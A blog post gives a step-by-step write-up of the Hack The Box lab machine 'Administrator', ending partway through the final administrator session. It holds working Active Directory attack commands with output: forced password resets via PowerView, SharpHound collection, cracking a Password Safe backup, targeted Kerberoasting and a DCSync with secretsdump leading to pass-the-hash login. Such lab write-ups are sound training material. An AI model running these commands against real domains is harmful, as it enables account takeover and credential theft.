<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="Hack the box - Administrator" />
<meta property="og:locale" content="en" />
<meta name="description" content="Hey everyone, today I want to explore a medium machine on HTB called Administrator. The main themes that persists throughout this box are AD privilege mismanagement abuse to gain increasingly privileged users, with some password cracking thrown into the mix. This was a very strange release coming from HTB, as I’ve not seen OSCP-like boxes in a very long time, but I’ll touch more on that in the conclusion." />
<meta property="og:description" content="Hey everyone, today I want to explore a medium machine on HTB called Administrator. The main themes that persists throughout this box are AD privilege mismanagement abuse to gain increasingly privileged users, with some password cracking thrown into the mix. This was a very strange release coming from HTB, as I’ve not seen OSCP-like boxes in a very long time, but I’ll touch more on that in the conclusion." />
<link rel="canonical" href="http://localhost:4000/posts/HTBAdministrator/" />
<meta property="og:url" content="http://localhost:4000/posts/HTBAdministrator/" />
<meta property="og:site_name" content="Archer’s Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-05T16:21:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Hack the box - Administrator" />
<meta name="twitter:site" content="@twitter_username" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-01-05T16:21:00+02:00","datePublished":"2025-01-05T16:21:00+02:00","description":"Hey everyone, today I want to explore a medium machine on HTB called Administrator. The main themes that persists throughout this box are AD privilege mismanagement abuse to gain increasingly privileged users, with some password cracking thrown into the mix. This was a very strange release coming from HTB, as I’ve not seen OSCP-like boxes in a very long time, but I’ll touch more on that in the conclusion.","headline":"Hack the box - Administrator","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/HTBAdministrator/"},"url":"http://localhost:4000/posts/HTBAdministrator/"}</script>
<!-- End Jekyll SEO tag -->


  <title>Hack the box - Administrator | Archer's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Archer's Blog">
<meta name="application-name" content="Archer's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/image/static/pfp.jpg" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Archer's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Programming, Pentesting and Discovering New Topics</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
      <button type="button" class="btn btn-link nav-link" aria-label="Switch Mode" id="mode-toggle">
        <i class="fas fa-adjust"></i>
      </button>

      
        <span class="icon-border"></span>
      
    

    
      

      
        <a
          href="https://github.com/archyinuse"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://www.linkedin.com/in/gilad-asher-chen-9b272026b/"
          aria-label="linkedin"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-linkedin"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['archyinuse','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>Hack the box - Administrator</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>Hack the box - Administrator</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1736086860"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan  5, 2025
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://twitter.com/username">Gilad Asher Chen</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1555 words"
>
  <em>8 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">Hack the box - Administrator</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">Hack the box - Administrator</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <p>Hey everyone, today I want to explore a medium machine on HTB called Administrator.
The main themes that persists throughout this box are AD privilege mismanagement abuse to gain increasingly privileged users, with some password cracking thrown into the mix.
This was a very strange release coming from HTB, as I’ve not seen OSCP-like boxes in a very long time, but I’ll touch more on that in the conclusion.</p>

<p>Unlike many HTB boxes, we actually start out with credentials to the domain for a user account <code class="language-plaintext highlighter-rouge">olivia</code> with the password <code class="language-plaintext highlighter-rouge">ichliebedich</code> (sidenote, that translates to I love you in german, how nice of them!)</p>

<h2 id="foothold"><span class="me-2">Foothold</span><a href="#foothold" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>I started out by running a normal port scan <code class="language-plaintext highlighter-rouge">nmap -sV -T5 administrator.htb</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-04 21:45:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
</pre></td></tr></tbody></table></code></div></div>
<p>At first glance this looks very normal apart from the FTP service that we should keep in mind for later.
While this box never required use of a user list as spraying is not apart of the solution, I did try it during the solve:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/htb/Machines/Medium/Administrator]
└─# netexec smb Administrator.htb -u Olivia -p ichliebedich --users | awk -F '               ' '{print $2}' &gt; users.txt
...
</pre></td></tr></tbody></table></code></div></div>

<p>I tried a couple things at first, spraying the password for other users, seeing if I can log into FTP, etc, but I soon remembered a small quirk of nmap when not scanning specific ports - it doesn’t scan the WinRM port! Sure enough after a full nmap port scan (<code class="language-plaintext highlighter-rouge">nmap -p- -T5 Administrator.htb</code>), WinRM revealed itself and we can log in with our given user account to gain a shell.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/htb/Machines/Medium/Administrator]
└─# evil-winrm -i administrator.htb -u olivia -p ichliebedich                                                                                                                       
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents&gt; 
</pre></td></tr></tbody></table></code></div></div>

<h2 id="olivia---michael"><span class="me-2">Olivia -&gt; Michael</span><a href="#olivia---michael" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>Enumerating over the machine itself did not prove useful, there wasn’t anything interesting I could access but even if I could the machine seemed very empty. Given that the machine is mostly empty and we know it’s a domain, I assumed this is going to be an AD machine, so I booted up BloodHound and got to collecting some data.</p>

<p>This is a good interlude to introduce a tool I’ve scripted called <code class="language-plaintext highlighter-rouge">startsmb</code>, which really saves you the hastle of moving files to and from kali and a windows host, this tool can be found on my github in pentest utils but in essence, it creates an SMB instance and copies the command you need to add it, very convinient in this box as we’ll be using it quite often.
<a href="/assets/image/2025-01-05/341188909-4ab7feaa-5e2b-440a-b111-2629bfd82646.png" class="popup img-link  shimmer"><img src="/assets/image/2025-01-05/341188909-4ab7feaa-5e2b-440a-b111-2629bfd82646.png" alt="startsmbScript" loading="lazy"></a></p>

<p>Now all we need to do is bring in sharphound, collect our data and move it back to our kali machine.</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>*Evil-WinRM* PS C:\Users\olivia&gt; net use w: \\10.10.14.113\archer /user:kali kali
*Evil-WinRM* PS C:\Users\olivia&gt; copy W:\SharpHound.exe .
*Evil-WinRM* PS C:\Users\olivia&gt; .\SharpHound.exe -c all
*Evil-WinRM* PS C:\Users\olivia&gt; copy 202* W:\
</pre></td></tr></tbody></table></code></div></div>

<p>Now that we’ve gathered our data, we can check if Olivia has any special privileges, and sure enough when looking at first degree object control, it seems like Olivia has <code class="language-plaintext highlighter-rouge">GenericAll</code> rights over <code class="language-plaintext highlighter-rouge">MICHAEL@ADMINISTRATOR.HTB</code>, this right allows us to force change the target user’s password, so let’s get to doing that</p>

<div class="language-ps highlighter-rouge"><div class="code-header">
        <span data-label-text="Ps"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="nf">PS</span> <span class="nf">C:\...</span><span class="p">&gt;</span> <span class="nf">import-module</span> <span class="nf">.\PowerView.ps1</span>

<span class="nf">PS</span> <span class="nf">C:\...</span><span class="p">&gt;</span> <span class="nf">$UserPassword</span> <span class="nf">=</span> <span class="nf">ConvertTo-SecureString</span> <span class="nf">'Password123!'</span> <span class="nf">-AsPlainText</span> <span class="nf">-Force</span>
<span class="nf">PS</span> <span class="nf">C:\...</span><span class="p">&gt;</span> <span class="nf">Set-DomainUserPassword</span> <span class="nf">-Identity</span> <span class="nf">Michael</span> <span class="nf">-AccountPassword</span> <span class="nf">$UserPassword</span> 
</pre></td></tr></tbody></table></code></div></div>

<p>We can confirm this worked via netexec:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/htb/Machines/Medium/Administrator]
└─# netexec winrm administrator.htb -u michael -p 'Password123!'
WINRM       10.129.81.221   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.81.221   5985   DC               [+] administrator.htb\michael:Password123! (Pwn3d!)
</pre></td></tr></tbody></table></code></div></div>

<h2 id="michael---benjamin"><span class="me-2">Michael -&gt; Benjamin</span><a href="#michael---benjamin" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Similarly to Olivia, Michael can log in with WinRM and when following the same steps to see what object control Michael has, the account can force change the password of <code class="language-plaintext highlighter-rouge">BENJAMIN@ADMINISTRATOR.HTB</code></p>

<p>we’ll follow the same steps as we did before, copy over PowerView, import it and use it to change the password of Benjamin:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>*Evil-WinRM* PS C:\Users\michael\documents&gt; net use w: \\10.10.14.113\archer /user:kali kali
The command completed successfully.
*Evil-WinRM* PS C:\Users\michael\documents&gt; copy W:\PowerView.ps1 .
*Evil-WinRM* PS C:\Users\michael\documents&gt; import-module .\PowerView.ps1

*Evil-WinRM* PS C:\Users\michael\documents&gt; $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\michael\documents&gt; Set-DomainUserPassword -Identity Benjamin -AccountPassword $UserPassword
</pre></td></tr></tbody></table></code></div></div>

<h2 id="benjamin---emily-user-flag"><span class="me-2">Benjamin -&gt; Emily (User flag)</span><a href="#benjamin---emily-user-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>2 user pivots and no user flag! Well, we have to keep going.
Going over Benjamin we run into a pitstop, we cannot log into WinRM and the account doesn’t seem to have any obvious dangerous privileges over other users.</p>

<p>When debating over what I should do I thought I should give FTP another try with the users I pwned, which ended up working for Benjamin (with our changed password of <code class="language-plaintext highlighter-rouge">Password123!</code>).
There I found a file <code class="language-plaintext highlighter-rouge">Backup.psafe3</code></p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/htb/Machines/Medium/Administrator]
└─# ftp benjamin@administrator.htb 
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: Password123!
230 User logged in.
Remote system type is Windows_NT.
ftp&gt; ls
229 Entering Extended Passive Mode (|||55541|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp&gt; 
</pre></td></tr></tbody></table></code></div></div>
<p>While I’ve never had the luxury of cracking a <code class="language-plaintext highlighter-rouge">psafe3</code> file, it follows a very similar path to a <code class="language-plaintext highlighter-rouge">kdbx</code> file, which I’ve cracked alot of. For <code class="language-plaintext highlighter-rouge">psafe3</code>, we can use <code class="language-plaintext highlighter-rouge">pwsafe2john</code> to get the hash of the file and crack it using <code class="language-plaintext highlighter-rouge">john</code>.</p>

<p>Small note: My kali runs on a VM therefore when cracking I always switch to my main rig, so cracking is done on windows, with <code class="language-plaintext highlighter-rouge">john</code> I find it simpler to use the GUI to crack.</p>

<p>John correctly identified the hash and I cracked it with <code class="language-plaintext highlighter-rouge">rockyou.txt</code>:
<a href="/assets/image/2025-01-05/image.png" class="popup img-link  shimmer"><img src="/assets/image/2025-01-05/image.png" alt="CrackingPWSAFEHash" loading="lazy"></a></p>

<p>We get the passphrase of <code class="language-plaintext highlighter-rouge">tekieromucho</code>, which much like our olivia password, also means I love you but this time in spanish!</p>

<p>Anyways, now that we can open the backup file, we get a hit on Emily’s password and can get a shell with WinRM and get the <code class="language-plaintext highlighter-rouge">user.txt</code> flag.</p>

<h2 id="emily---ethan"><span class="me-2">Emily -&gt; Ethan</span><a href="#emily---ethan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Going back to BloodHound, this time we can see a clear path to victory using the Shortest Paths to DA from Owned Principles analysis:
<a href="/assets/image/2025-01-05/image2.png" class="popup img-link  shimmer"><img src="/assets/image/2025-01-05/image2.png" alt="alt text" loading="lazy"></a></p>

<p>Let’s start with a <code class="language-plaintext highlighter-rouge">GenericWrite</code> privilege over the Ethan account. Contrary to what the name suggests, we cannot write over <em>any</em> property of Ethan (namely, force changing his password) but we can perform a targeted kerberoast to get his password hash and try to crack it.</p>

<p>we’ll be using <a href="https://github.com/ShutdownRepo/targetedKerberoast">this</a> tool with the suggested command from bloodhound:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/…/Machines/Medium/Administrator/targetedKerberoast]
└─# python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -f hashcat 

&lt;...&gt;
</pre></td></tr></tbody></table></code></div></div>

<p>If you get a clock skew error, you have to manually set your time to match the machine:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/…/Machines/Medium/Administrator/targetedKerberoast]
└─# timedatectl set-ntp off     
┌──(root㉿kali)-[~/…/Machines/Medium/Administrator/targetedKerberoast]
└─# rdate -n administrator.htb
Sat Jan  4 18:25:08 EST 2025
</pre></td></tr></tbody></table></code></div></div>

<p>After getting the hash, we can crack it using hashcat:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>&gt;hashcat -a 0 -m 13100 hashes\administrator.krb5.hash rockyou.txt
...
&lt;hash&gt;:limpbizkit
...
</pre></td></tr></tbody></table></code></div></div>
<p>and of course confirm we successfully pwned the user!
<a href="/assets/image/2025-01-05/Pasted%20image%2020250104182816.png" class="popup img-link  shimmer"><img src="/assets/image/2025-01-05/Pasted%20image%2020250104182816.png" alt="pwned ethan" loading="lazy"></a></p>

<h2 id="ethan---root"><span class="me-2">Ethan -&gt; Root</span><a href="#ethan---root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Alright, we’re very close! A DCSync attack will net us the administrator NTLM hash which we can use to log in with WinRM!
To perform the attack we’ll use <code class="language-plaintext highlighter-rouge">impacket-secretsdump</code> with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/…/Machines/Medium/Administrator/targetedKerberoast]
└─# impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@'administrator.htb'
...
Administrator:500:XXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXX:::
...
</pre></td></tr></tbody></table></code></div></div>
<p>We successfully get the NTLM hash of the administrator and we can now log in to the machine.</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre>┌──(root㉿kali)-[~/…/Machines/Medium/Administrator/targetedKerberoast]
└─# evil-winrm -i administrator.htb -u administrator -H 'XXXXXXXXXXXX'

...

*Evil-WinRM* PS C:\Users\Administrator\Documents&gt; cd ..
